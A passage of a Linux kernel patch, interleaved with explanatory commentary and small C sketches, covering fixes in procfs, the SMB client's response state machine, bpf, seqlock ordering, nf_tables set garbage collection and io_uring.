+ 	struct proc_maps_private *priv = m->private;
++	struct mm_struct *mm = priv->mm;
+ 
+-	if (!IS_ERR_OR_NULL(_vml)) {
+-		mmap_read_unlock(priv->mm);
+-		mmput(priv->mm);
+-	}
+-	if (priv->task) {
+-		put_task_struct(priv->task);
+-		priv->task = NULL;
+-	}
++	if (!priv->task)
++		return;
++
++	mmap_read_unlock(mm);
++	mmput(mm);
++	put_task_struct(priv->task);
++	priv->task = NULL;
+ }
+ 
+-static void *m_next(struct seq_file *m, void *_p, loff_t *pos)
++static void *m_next(struct seq_file *m, void *_p, loff_t *ppos)
+ {
+-	struct vm_area_struct *vma = _p;
+-
+-	*pos = vma->vm_end;
+-	return find_vma(vma->vm_mm, vma->vm_end);
++	return proc_get_vma(m->private, ppos);
+ }
+ 
+ static const struct seq_operations proc_pid_maps_ops = {
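
The task_nommu.c rewrite brings the nommu /proc/<pid>/maps iterator in line with the MMU variant: the seq_file position is the start address of the VMA just emitted, -1UL is the end sentinel, and a struct vma_iterator held in proc_maps_private replaces the repeated find_vma() walks (which is also why the iter field can lose its #ifdef CONFIG_MMU guard above). The position contract, condensed (a sketch with the refcounting and locking elided):

static void *m_start(struct seq_file *m, loff_t *ppos)
{
	if (*ppos == -1UL)		/* finished on a previous read() */
		return NULL;
	/* ... pin task/mm, take the mmap read lock ... */
	vma_iter_init(&priv->iter, mm, *ppos);
	return proc_get_vma(priv, ppos);	/* returns a VMA, stores its vm_start */
}

Because the iterator keeps its own cursor, m_next() collapses to a single proc_get_vma() call, and m_stop() can key all teardown off priv->task being non-NULL.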
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 03f34ec63e10d..39602f39aea8f 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -1776,6 +1776,7 @@ static inline bool is_retryable_error(int error)
+ #define   MID_RETRY_NEEDED      8 /* session closed while this request out */
+ #define   MID_RESPONSE_MALFORMED 0x10
+ #define   MID_SHUTDOWN		 0x20
++#define   MID_RESPONSE_READY 0x40 /* ready for other process to handle the rsp */
+ 
+ /* Flags */
+ #define   MID_WAIT_CANCELLED	 1 /* Cancelled while waiting for response */
+diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
+index e2e2ef0fa9a0f..f4818599c00a2 100644
+--- a/fs/smb/client/fs_context.c
++++ b/fs/smb/client/fs_context.c
+@@ -1487,6 +1487,7 @@ static int smb3_fs_context_parse_param(struct fs_context *fc,
+ 
+  cifs_parse_mount_err:
+ 	kfree_sensitive(ctx->password);
++	ctx->password = NULL;
+ 	return -EINVAL;
+ }
+ 
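
The fs_context.c fix is the classic free-and-clear pattern: ctx->password is freed on the parse error path, but the context object lives on and its teardown frees the field again. Nulling the pointer makes the second kfree_sensitive() a no-op (like free(NULL) in userspace). A standalone model:

#include <stdlib.h>

struct ctx { char *password; };

static void parse_fail(struct ctx *ctx)
{
	free(ctx->password);
	ctx->password = NULL;	/* later cleanup may free() again safely */
}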
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 92c1ed9304be7..9531ea2430899 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -2605,7 +2605,7 @@ int cifs_fiemap(struct inode *inode, struct fiemap_extent_info *fei, u64 start,
+ 	}
+ 
+ 	cifsFileInfo_put(cfile);
+-	return -ENOTSUPP;
++	return -EOPNOTSUPP;
+ }
+ 
+ int cifs_truncate_page(struct address_space *mapping, loff_t from)
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 1387d5126f53b..efff7137412b4 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -292,7 +292,7 @@ smb2_adjust_credits(struct TCP_Server_Info *server,
+ 		cifs_server_dbg(VFS, "request has less credits (%d) than required (%d)",
+ 				credits->value, new_val);
+ 
+-		return -ENOTSUPP;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	spin_lock(&server->req_lock);
+@@ -1155,7 +1155,7 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 			/* Use a fudge factor of 256 bytes in case we collide
+ 			 * with a different set_EAs command.
+ 			 */
+-			if(CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
++			if (CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
+ 			   MAX_SMB2_CLOSE_RESPONSE_SIZE - 256 <
+ 			   used_len + ea_name_len + ea_value_len + 1) {
+ 				rc = -ENOSPC;
+@@ -4721,7 +4721,7 @@ handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid,
+ 
+ 	if (shdr->Command != SMB2_READ) {
+ 		cifs_server_dbg(VFS, "only big read responses are supported\n");
+-		return -ENOTSUPP;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	if (server->ops->is_session_expired &&
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index e03ffcf7e201c..87aea456ee903 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -35,6 +35,8 @@
+ void
+ cifs_wake_up_task(struct mid_q_entry *mid)
+ {
++	if (mid->mid_state == MID_RESPONSE_RECEIVED)
++		mid->mid_state = MID_RESPONSE_READY;
+ 	wake_up_process(mid->callback_data);
+ }
+ 
+@@ -87,7 +89,8 @@ static void __release_mid(struct kref *refcount)
+ 	struct TCP_Server_Info *server = midEntry->server;
+ 
+ 	if (midEntry->resp_buf && (midEntry->mid_flags & MID_WAIT_CANCELLED) &&
+-	    midEntry->mid_state == MID_RESPONSE_RECEIVED &&
++	    (midEntry->mid_state == MID_RESPONSE_RECEIVED ||
++	     midEntry->mid_state == MID_RESPONSE_READY) &&
+ 	    server->ops->handle_cancelled_mid)
+ 		server->ops->handle_cancelled_mid(midEntry, server);
+ 
+@@ -759,7 +762,8 @@ wait_for_response(struct TCP_Server_Info *server, struct mid_q_entry *midQ)
+ 	int error;
+ 
+ 	error = wait_event_state(server->response_q,
+-				 midQ->mid_state != MID_REQUEST_SUBMITTED,
++				 midQ->mid_state != MID_REQUEST_SUBMITTED &&
++				 midQ->mid_state != MID_RESPONSE_RECEIVED,
+ 				 (TASK_KILLABLE|TASK_FREEZABLE_UNSAFE));
+ 	if (error < 0)
+ 		return -ERESTARTSYS;
+@@ -912,7 +916,7 @@ cifs_sync_mid_result(struct mid_q_entry *mid, struct TCP_Server_Info *server)
+ 
+ 	spin_lock(&server->mid_lock);
+ 	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
++	case MID_RESPONSE_READY:
+ 		spin_unlock(&server->mid_lock);
+ 		return rc;
+ 	case MID_RETRY_NEEDED:
+@@ -1011,6 +1015,9 @@ cifs_compound_callback(struct mid_q_entry *mid)
+ 	credits.instance = server->reconnect_instance;
+ 
+ 	add_credits(server, &credits, mid->optype);
++
++	if (mid->mid_state == MID_RESPONSE_RECEIVED)
++		mid->mid_state = MID_RESPONSE_READY;
+ }
+ 
+ static void
+@@ -1206,7 +1213,8 @@ compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+ 			send_cancel(server, &rqst[i], midQ[i]);
+ 			spin_lock(&server->mid_lock);
+ 			midQ[i]->mid_flags |= MID_WAIT_CANCELLED;
+-			if (midQ[i]->mid_state == MID_REQUEST_SUBMITTED) {
++			if (midQ[i]->mid_state == MID_REQUEST_SUBMITTED ||
++			    midQ[i]->mid_state == MID_RESPONSE_RECEIVED) {
+ 				midQ[i]->callback = cifs_cancelled_callback;
+ 				cancelled_mid[i] = true;
+ 				credits[i].value = 0;
+@@ -1227,7 +1235,7 @@ compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+ 		}
+ 
+ 		if (!midQ[i]->resp_buf ||
+-		    midQ[i]->mid_state != MID_RESPONSE_RECEIVED) {
++		    midQ[i]->mid_state != MID_RESPONSE_READY) {
+ 			rc = -EIO;
+ 			cifs_dbg(FYI, "Bad MID state?\n");
+ 			goto out;
+@@ -1414,7 +1422,8 @@ SendReceive(const unsigned int xid, struct cifs_ses *ses,
+ 	if (rc != 0) {
+ 		send_cancel(server, &rqst, midQ);
+ 		spin_lock(&server->mid_lock);
+-		if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
++		if (midQ->mid_state == MID_REQUEST_SUBMITTED ||
++		    midQ->mid_state == MID_RESPONSE_RECEIVED) {
+ 			/* no longer considered to be "in-flight" */
+ 			midQ->callback = release_mid;
+ 			spin_unlock(&server->mid_lock);
+@@ -1431,7 +1440,7 @@ SendReceive(const unsigned int xid, struct cifs_ses *ses,
+ 	}
+ 
+ 	if (!midQ->resp_buf || !out_buf ||
+-	    midQ->mid_state != MID_RESPONSE_RECEIVED) {
++	    midQ->mid_state != MID_RESPONSE_READY) {
+ 		rc = -EIO;
+ 		cifs_server_dbg(VFS, "Bad MID state?\n");
+ 		goto out;
+@@ -1555,14 +1564,16 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	/* Wait for a reply - allow signals to interrupt. */
+ 	rc = wait_event_interruptible(server->response_q,
+-		(!(midQ->mid_state == MID_REQUEST_SUBMITTED)) ||
++		(!(midQ->mid_state == MID_REQUEST_SUBMITTED ||
++		   midQ->mid_state == MID_RESPONSE_RECEIVED)) ||
+ 		((server->tcpStatus != CifsGood) &&
+ 		 (server->tcpStatus != CifsNew)));
+ 
+ 	/* Were we interrupted by a signal ? */
+ 	spin_lock(&server->srv_lock);
+ 	if ((rc == -ERESTARTSYS) &&
+-		(midQ->mid_state == MID_REQUEST_SUBMITTED) &&
++		(midQ->mid_state == MID_REQUEST_SUBMITTED ||
++		 midQ->mid_state == MID_RESPONSE_RECEIVED) &&
+ 		((server->tcpStatus == CifsGood) ||
+ 		 (server->tcpStatus == CifsNew))) {
+ 		spin_unlock(&server->srv_lock);
+@@ -1593,7 +1604,8 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 		if (rc) {
+ 			send_cancel(server, &rqst, midQ);
+ 			spin_lock(&server->mid_lock);
+-			if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
++			if (midQ->mid_state == MID_REQUEST_SUBMITTED ||
++			    midQ->mid_state == MID_RESPONSE_RECEIVED) {
+ 				/* no longer considered to be "in-flight" */
+ 				midQ->callback = release_mid;
+ 				spin_unlock(&server->mid_lock);
+@@ -1613,7 +1625,7 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 		return rc;
+ 
+ 	/* rcvd frame is ok */
+-	if (out_buf == NULL || midQ->mid_state != MID_RESPONSE_RECEIVED) {
++	if (out_buf == NULL || midQ->mid_state != MID_RESPONSE_READY) {
+ 		rc = -EIO;
+ 		cifs_tcon_dbg(VFS, "Bad MID state?\n");
+ 		goto out;
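
All of the transport.c changes implement one idea: response completion becomes a two-phase state machine. The demultiplexing thread publishes MID_RESPONSE_RECEIVED when the buffer is filled, the mid's callback finishes its bookkeeping (credit accounting, wakeups) and only then publishes MID_RESPONSE_READY, and every waiter and consumer now keys off READY so it cannot race the still-running callback. Condensed (an illustrative model, not the cifs definitions):

enum mid_state {
	SUBMITTED,	/* request sent, nothing back yet */
	RECEIVED,	/* buffer filled, callback still running */
	READY,		/* callback done: response safe to consume */
};

/* Waiters block until the callback has finished, not merely until the
 * response arrived: */
wait_event(response_q, state != SUBMITTED && state != RECEIVED);

This is also why the cancellation paths above treat RECEIVED like SUBMITTED: a mid in that window is still "in flight" from the consumer's point of view.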
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index b3d3aa8437dce..1ed2ec035e779 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -301,7 +301,7 @@ static inline void bpf_long_memcpy(void *dst, const void *src, u32 size)
+ 
+ 	size /= sizeof(long);
+ 	while (size--)
+-		*ldst++ = *lsrc++;
++		data_race(*ldst++ = *lsrc++);
+ }
+ 
+ /* copy everything but bpf_spin_lock, bpf_timer, and kptrs. There could be one of each. */
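
bpf_long_memcpy() deliberately copies map values word-by-word while concurrent lookups may be reading them; data_race() (from include/linux/compiler.h) marks each store as an intentional race so KCSAN stops reporting it. It adds no atomicity or ordering, only documentation. A usage model:

/* A counter that tolerates lost updates under contention; data_race()
 * documents the race for KCSAN, it does not make the ++ atomic. */
static unsigned long hits;

static void count_hit(void)
{
	data_race(hits++);
}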
+diff --git a/include/linux/btf_ids.h b/include/linux/btf_ids.h
+index 2b98720084285..0f02bbb205735 100644
+--- a/include/linux/btf_ids.h
++++ b/include/linux/btf_ids.h
+@@ -49,7 +49,7 @@ word							\
+ 	____BTF_ID(symbol, word)
+ 
+ #define __ID(prefix) \
+-	__PASTE(prefix, __COUNTER__)
++	__PASTE(__PASTE(prefix, __COUNTER__), __LINE__)
+ 
+ /*
+  * The BTF_ID defines unique symbol for each ID pointing
+diff --git a/include/linux/if_team.h b/include/linux/if_team.h
+index 8de6b6e678295..34bcba5a70677 100644
+--- a/include/linux/if_team.h
++++ b/include/linux/if_team.h
+@@ -189,6 +189,8 @@ struct team {
+ 	struct net_device *dev; /* associated netdevice */
+ 	struct team_pcpu_stats __percpu *pcpu_stats;
+ 
++	const struct header_ops *header_ops_cache;
++
+ 	struct mutex lock; /* used for overall locking, e.g. port lists write */
+ 
+ 	/*
+diff --git a/include/linux/interrupt.h b/include/linux/interrupt.h
+index a92bce40b04b3..4a1dc88ddbff9 100644
+--- a/include/linux/interrupt.h
++++ b/include/linux/interrupt.h
+@@ -569,8 +569,12 @@ enum
+  * 	2) rcu_report_dead() reports the final quiescent states.
+  *
+  * _ IRQ_POLL: irq_poll_cpu_dead() migrates the queue
++ *
++ * _ (HR)TIMER_SOFTIRQ: (hr)timers_dead_cpu() migrates the queue
+  */
+-#define SOFTIRQ_HOTPLUG_SAFE_MASK (BIT(RCU_SOFTIRQ) | BIT(IRQ_POLL_SOFTIRQ))
++#define SOFTIRQ_HOTPLUG_SAFE_MASK (BIT(TIMER_SOFTIRQ) | BIT(IRQ_POLL_SOFTIRQ) |\
++				   BIT(HRTIMER_SOFTIRQ) | BIT(RCU_SOFTIRQ))
++
+ 
+ /* map softirq index to softirq name. update 'softirq_to_name' in
+  * kernel/softirq.c when adding a new softirq.
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index 4c9b322bb3d88..a9ec8d97a715b 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -253,7 +253,7 @@ enum {
+ 	 * advised to wait only for the following duration before
+ 	 * doing SRST.
+ 	 */
+-	ATA_TMOUT_PMP_SRST_WAIT	= 5000,
++	ATA_TMOUT_PMP_SRST_WAIT	= 10000,
+ 
+ 	/* When the LPM policy is set to ATA_LPM_MAX_POWER, there might
+ 	 * be a spurious PHY event, so ignore the first PHY event that
+@@ -1136,6 +1136,7 @@ extern int ata_std_bios_param(struct scsi_device *sdev,
+ 			      struct block_device *bdev,
+ 			      sector_t capacity, int geom[]);
+ extern void ata_scsi_unlock_native_capacity(struct scsi_device *sdev);
++extern int ata_scsi_slave_alloc(struct scsi_device *sdev);
+ extern int ata_scsi_slave_config(struct scsi_device *sdev);
+ extern void ata_scsi_slave_destroy(struct scsi_device *sdev);
+ extern int ata_scsi_change_queue_depth(struct scsi_device *sdev,
+@@ -1384,6 +1385,7 @@ extern const struct attribute_group *ata_common_sdev_groups[];
+ 	.this_id		= ATA_SHT_THIS_ID,		\
+ 	.emulated		= ATA_SHT_EMULATED,		\
+ 	.proc_name		= drv_name,			\
++	.slave_alloc		= ata_scsi_slave_alloc,		\
+ 	.slave_destroy		= ata_scsi_slave_destroy,	\
+ 	.bios_param		= ata_std_bios_param,		\
+ 	.unlock_native_capacity	= ata_scsi_unlock_native_capacity,\
+diff --git a/include/linux/memcontrol.h b/include/linux/memcontrol.h
+index 099521835cd14..50a078a31734c 100644
+--- a/include/linux/memcontrol.h
++++ b/include/linux/memcontrol.h
+@@ -902,7 +902,7 @@ unsigned long mem_cgroup_get_zone_lru_size(struct lruvec *lruvec,
+ 	return READ_ONCE(mz->lru_zone_size[zone_idx][lru]);
+ }
+ 
+-void mem_cgroup_handle_over_high(void);
++void mem_cgroup_handle_over_high(gfp_t gfp_mask);
+ 
+ unsigned long mem_cgroup_get_max(struct mem_cgroup *memcg);
+ 
+@@ -1437,7 +1437,7 @@ static inline void mem_cgroup_unlock_pages(void)
+ 	rcu_read_unlock();
+ }
+ 
+-static inline void mem_cgroup_handle_over_high(void)
++static inline void mem_cgroup_handle_over_high(gfp_t gfp_mask)
+ {
+ }
+ 
+diff --git a/include/linux/nfs_fs_sb.h b/include/linux/nfs_fs_sb.h
+index ea2f7e6b1b0b5..ef8ba5fbc6503 100644
+--- a/include/linux/nfs_fs_sb.h
++++ b/include/linux/nfs_fs_sb.h
+@@ -48,6 +48,7 @@ struct nfs_client {
+ #define NFS_CS_NOPING		6		/* - don't ping on connect */
+ #define NFS_CS_DS		7		/* - Server is a DS */
+ #define NFS_CS_REUSEPORT	8		/* - reuse src port on reconnect */
++#define NFS_CS_PNFS		9		/* - Server used for pnfs */
+ 	struct sockaddr_storage	cl_addr;	/* server identifier */
+ 	size_t			cl_addrlen;
+ 	char *			cl_hostname;	/* hostname of server */
+diff --git a/include/linux/nfs_page.h b/include/linux/nfs_page.h
+index ba7e2e4b09264..e39a8cf8b1797 100644
+--- a/include/linux/nfs_page.h
++++ b/include/linux/nfs_page.h
+@@ -145,7 +145,9 @@ extern	void nfs_unlock_request(struct nfs_page *req);
+ extern	void nfs_unlock_and_release_request(struct nfs_page *);
+ extern	struct nfs_page *nfs_page_group_lock_head(struct nfs_page *req);
+ extern	int nfs_page_group_lock_subrequests(struct nfs_page *head);
+-extern	void nfs_join_page_group(struct nfs_page *head, struct inode *inode);
++extern void nfs_join_page_group(struct nfs_page *head,
++				struct nfs_commit_info *cinfo,
++				struct inode *inode);
+ extern int nfs_page_group_lock(struct nfs_page *);
+ extern void nfs_page_group_unlock(struct nfs_page *);
+ extern bool nfs_page_group_sync_on_bit(struct nfs_page *, unsigned int);
+diff --git a/include/linux/resume_user_mode.h b/include/linux/resume_user_mode.h
+index 2851894544496..f8f3e958e9cf2 100644
+--- a/include/linux/resume_user_mode.h
++++ b/include/linux/resume_user_mode.h
+@@ -55,7 +55,7 @@ static inline void resume_user_mode_work(struct pt_regs *regs)
+ 	}
+ #endif
+ 
+-	mem_cgroup_handle_over_high();
++	mem_cgroup_handle_over_high(GFP_KERNEL);
+ 	blkcg_maybe_throttle_current();
+ 
+ 	rseq_handle_notify_resume(NULL, regs);
+diff --git a/include/linux/seqlock.h b/include/linux/seqlock.h
+index 3926e90279477..d778af83c8f36 100644
+--- a/include/linux/seqlock.h
++++ b/include/linux/seqlock.h
+@@ -512,8 +512,8 @@ do {									\
+ 
+ static inline void do_write_seqcount_begin_nested(seqcount_t *s, int subclass)
+ {
+-	do_raw_write_seqcount_begin(s);
+ 	seqcount_acquire(&s->dep_map, subclass, 0, _RET_IP_);
++	do_raw_write_seqcount_begin(s);
+ }
+ 
+ /**
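
The seqlock.h hunk only swaps two lines, but the order matters: the lockdep annotation now runs before the write section is opened. If lockdep decides to report, it does so while the sequence count is still even, so a reader of the same seqcount reached from the report path (retrying while the sequence is odd) cannot live-lock against a write section the reporter itself holds; that is the usual motivation for annotate-before-acquire orderings. Annotated:

static inline void do_write_seqcount_begin_nested(seqcount_t *s, int subclass)
{
	/* annotate first: a lockdep report here can still run safely */
	seqcount_acquire(&s->dep_map, subclass, 0, _RET_IP_);
	/* only then bump the sequence to odd and open the write section */
	do_raw_write_seqcount_begin(s);
}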
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index c752b6f509791..d1f81a6d7773b 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -507,6 +507,7 @@ struct nft_set_elem_expr {
+  *
+  *	@list: table set list node
+  *	@bindings: list of set bindings
++ *	@refs: internal refcounting for async set destruction
+  *	@table: table this set belongs to
+  *	@net: netnamespace this set belongs to
+  * 	@name: name of the set
+@@ -528,6 +529,7 @@ struct nft_set_elem_expr {
+  *	@expr: stateful expression
+  * 	@ops: set ops
+  * 	@flags: set flags
++ *	@dead: set will be freed, never cleared
+  *	@genmask: generation mask
+  * 	@klen: key length
+  * 	@dlen: data length
+@@ -536,6 +538,7 @@ struct nft_set_elem_expr {
+ struct nft_set {
+ 	struct list_head		list;
+ 	struct list_head		bindings;
++	refcount_t			refs;
+ 	struct nft_table		*table;
+ 	possible_net_t			net;
+ 	char				*name;
+@@ -557,7 +560,8 @@ struct nft_set {
+ 	struct list_head		pending_update;
+ 	/* runtime data below here */
+ 	const struct nft_set_ops	*ops ____cacheline_aligned;
+-	u16				flags:14,
++	u16				flags:13,
++					dead:1,
+ 					genmask:2;
+ 	u8				klen;
+ 	u8				dlen;
+@@ -578,6 +582,11 @@ static inline void *nft_set_priv(const struct nft_set *set)
+ 	return (void *)set->data;
+ }
+ 
++static inline bool nft_set_gc_is_pending(const struct nft_set *s)
++{
++	return refcount_read(&s->refs) != 1;
++}
++
+ static inline struct nft_set *nft_set_container_of(const void *priv)
+ {
+ 	return (void *)priv - offsetof(struct nft_set, data);
+@@ -591,7 +600,6 @@ struct nft_set *nft_set_lookup_global(const struct net *net,
+ 
+ struct nft_set_ext *nft_set_catchall_lookup(const struct net *net,
+ 					    const struct nft_set *set);
+-void *nft_set_catchall_gc(const struct nft_set *set);
+ 
+ static inline unsigned long nft_set_gc_interval(const struct nft_set *set)
+ {
+@@ -808,62 +816,6 @@ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
+ 				const struct nft_set *set, void *elem);
+ 
+-/**
+- *	struct nft_set_gc_batch_head - nf_tables set garbage collection batch
+- *
+- *	@rcu: rcu head
+- *	@set: set the elements belong to
+- *	@cnt: count of elements
+- */
+-struct nft_set_gc_batch_head {
+-	struct rcu_head			rcu;
+-	const struct nft_set		*set;
+-	unsigned int			cnt;
+-};
+-
+-#define NFT_SET_GC_BATCH_SIZE	((PAGE_SIZE -				  \
+-				  sizeof(struct nft_set_gc_batch_head)) / \
+-				 sizeof(void *))
+-
+-/**
+- *	struct nft_set_gc_batch - nf_tables set garbage collection batch
+- *
+- * 	@head: GC batch head
+- * 	@elems: garbage collection elements
+- */
+-struct nft_set_gc_batch {
+-	struct nft_set_gc_batch_head	head;
+-	void				*elems[NFT_SET_GC_BATCH_SIZE];
+-};
+-
+-struct nft_set_gc_batch *nft_set_gc_batch_alloc(const struct nft_set *set,
+-						gfp_t gfp);
+-void nft_set_gc_batch_release(struct rcu_head *rcu);
+-
+-static inline void nft_set_gc_batch_complete(struct nft_set_gc_batch *gcb)
+-{
+-	if (gcb != NULL)
+-		call_rcu(&gcb->head.rcu, nft_set_gc_batch_release);
+-}
+-
+-static inline struct nft_set_gc_batch *
+-nft_set_gc_batch_check(const struct nft_set *set, struct nft_set_gc_batch *gcb,
+-		       gfp_t gfp)
+-{
+-	if (gcb != NULL) {
+-		if (gcb->head.cnt + 1 < ARRAY_SIZE(gcb->elems))
+-			return gcb;
+-		nft_set_gc_batch_complete(gcb);
+-	}
+-	return nft_set_gc_batch_alloc(set, gfp);
+-}
+-
+-static inline void nft_set_gc_batch_add(struct nft_set_gc_batch *gcb,
+-					void *elem)
+-{
+-	gcb->elems[gcb->head.cnt++] = elem;
+-}
+-
+ struct nft_expr_ops;
+ /**
+  *	struct nft_expr_type - nf_tables expression type
+@@ -1542,39 +1494,30 @@ static inline void nft_set_elem_change_active(const struct net *net,
+ 
+ #endif /* IS_ENABLED(CONFIG_NF_TABLES) */
+ 
+-/*
+- * We use a free bit in the genmask field to indicate the element
+- * is busy, meaning it is currently being processed either by
+- * the netlink API or GC.
+- *
+- * Even though the genmask is only a single byte wide, this works
+- * because the extension structure if fully constant once initialized,
+- * so there are no non-atomic write accesses unless it is already
+- * marked busy.
+- */
+-#define NFT_SET_ELEM_BUSY_MASK	(1 << 2)
++#define NFT_SET_ELEM_DEAD_MASK	(1 << 2)
+ 
+ #if defined(__LITTLE_ENDIAN_BITFIELD)
+-#define NFT_SET_ELEM_BUSY_BIT	2
++#define NFT_SET_ELEM_DEAD_BIT	2
+ #elif defined(__BIG_ENDIAN_BITFIELD)
+-#define NFT_SET_ELEM_BUSY_BIT	(BITS_PER_LONG - BITS_PER_BYTE + 2)
++#define NFT_SET_ELEM_DEAD_BIT	(BITS_PER_LONG - BITS_PER_BYTE + 2)
+ #else
+ #error
+ #endif
+ 
+-static inline int nft_set_elem_mark_busy(struct nft_set_ext *ext)
++static inline void nft_set_elem_dead(struct nft_set_ext *ext)
+ {
+ 	unsigned long *word = (unsigned long *)ext;
+ 
+ 	BUILD_BUG_ON(offsetof(struct nft_set_ext, genmask) != 0);
+-	return test_and_set_bit(NFT_SET_ELEM_BUSY_BIT, word);
++	set_bit(NFT_SET_ELEM_DEAD_BIT, word);
+ }
+ 
+-static inline void nft_set_elem_clear_busy(struct nft_set_ext *ext)
++static inline int nft_set_elem_is_dead(const struct nft_set_ext *ext)
+ {
+ 	unsigned long *word = (unsigned long *)ext;
+ 
+-	clear_bit(NFT_SET_ELEM_BUSY_BIT, word);
++	BUILD_BUG_ON(offsetof(struct nft_set_ext, genmask) != 0);
++	return test_bit(NFT_SET_ELEM_DEAD_BIT, word);
+ }
+ 
+ /**
+@@ -1708,6 +1651,39 @@ struct nft_trans_flowtable {
+ #define nft_trans_flowtable_flags(trans)	\
+ 	(((struct nft_trans_flowtable *)trans->data)->flags)
+ 
++#define NFT_TRANS_GC_BATCHCOUNT	256
++
++struct nft_trans_gc {
++	struct list_head	list;
++	struct net		*net;
++	struct nft_set		*set;
++	u32			seq;
++	u16			count;
++	void			*priv[NFT_TRANS_GC_BATCHCOUNT];
++	struct rcu_head		rcu;
++};
++
++struct nft_trans_gc *nft_trans_gc_alloc(struct nft_set *set,
++					unsigned int gc_seq, gfp_t gfp);
++void nft_trans_gc_destroy(struct nft_trans_gc *trans);
++
++struct nft_trans_gc *nft_trans_gc_queue_async(struct nft_trans_gc *gc,
++					      unsigned int gc_seq, gfp_t gfp);
++void nft_trans_gc_queue_async_done(struct nft_trans_gc *gc);
++
++struct nft_trans_gc *nft_trans_gc_queue_sync(struct nft_trans_gc *gc, gfp_t gfp);
++void nft_trans_gc_queue_sync_done(struct nft_trans_gc *trans);
++
++void nft_trans_gc_elem_add(struct nft_trans_gc *gc, void *priv);
++
++struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
++						 unsigned int gc_seq);
++struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc);
++
++void nft_setelem_data_deactivate(const struct net *net,
++				 const struct nft_set *set,
++				 struct nft_set_elem *elem);
++
+ int __init nft_chain_filter_init(void);
+ void nft_chain_filter_fini(void);
+ 
+@@ -1735,6 +1711,7 @@ struct nftables_pernet {
+ 	u64			table_handle;
+ 	unsigned int		base_seq;
+ 	u8			validate_state;
++	unsigned int		gc_seq;
+ };
+ 
+ extern unsigned int nf_tables_net_id;
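
The nf_tables.h rework replaces the old per-element "busy bit" protocol and synchronous GC batches with three pieces: a refcount on struct nft_set, so asynchronous GC work can keep a set alive after the transaction that deleted it; a monotonic dead bit on elements (set once, never cleared); and fixed-size nft_trans_gc batches validated against a per-netns gc_seq. The lifetime rule implied by the refcount, as the nf_tables_api.c hunks below spell out:

/* one base reference belongs to the table; anything above it is a
 * GC batch still in flight */
static inline bool nft_set_gc_is_pending(const struct nft_set *s)
{
	return refcount_read(&s->refs) != 1;
}

static void nft_set_put(struct nft_set *set)
{
	if (refcount_dec_and_test(&set->refs)) {
		kfree(set->name);	/* final reference: really free */
		kvfree(set);
	}
}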
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 51b9aa640ad2a..53bc487947197 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -1837,7 +1837,9 @@ union bpf_attr {
+  * 		performed again, if the helper is used in combination with
+  * 		direct packet access.
+  * 	Return
+- * 		0 on success, or a negative error in case of failure.
++ * 		0 on success, or a negative error in case of failure. Positive
++ * 		error indicates a potential drop or congestion in the target
++ * 		device. The particular positive error codes are not defined.
+  *
+  * u64 bpf_get_current_pid_tgid(void)
+  * 	Description
+diff --git a/io_uring/fs.c b/io_uring/fs.c
+index 7100c293c13a8..27676e0150049 100644
+--- a/io_uring/fs.c
++++ b/io_uring/fs.c
+@@ -243,7 +243,7 @@ int io_linkat_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	struct io_link *lnk = io_kiocb_to_cmd(req, struct io_link);
+ 	const char __user *oldf, *newf;
+ 
+-	if (sqe->rw_flags || sqe->buf_index || sqe->splice_fd_in)
++	if (sqe->buf_index || sqe->splice_fd_in)
+ 		return -EINVAL;
+ 	if (unlikely(req->flags & REQ_F_FIXED_FILE))
+ 		return -EBADF;
+diff --git a/kernel/bpf/queue_stack_maps.c b/kernel/bpf/queue_stack_maps.c
+index 8a5e060de63bc..a8fe640318c6c 100644
+--- a/kernel/bpf/queue_stack_maps.c
++++ b/kernel/bpf/queue_stack_maps.c
+@@ -102,7 +102,12 @@ static int __queue_map_get(struct bpf_map *map, void *value, bool delete)
+ 	int err = 0;
+ 	void *ptr;
+ 
+-	raw_spin_lock_irqsave(&qs->lock, flags);
++	if (in_nmi()) {
++		if (!raw_spin_trylock_irqsave(&qs->lock, flags))
++			return -EBUSY;
++	} else {
++		raw_spin_lock_irqsave(&qs->lock, flags);
++	}
+ 
+ 	if (queue_stack_map_is_empty(qs)) {
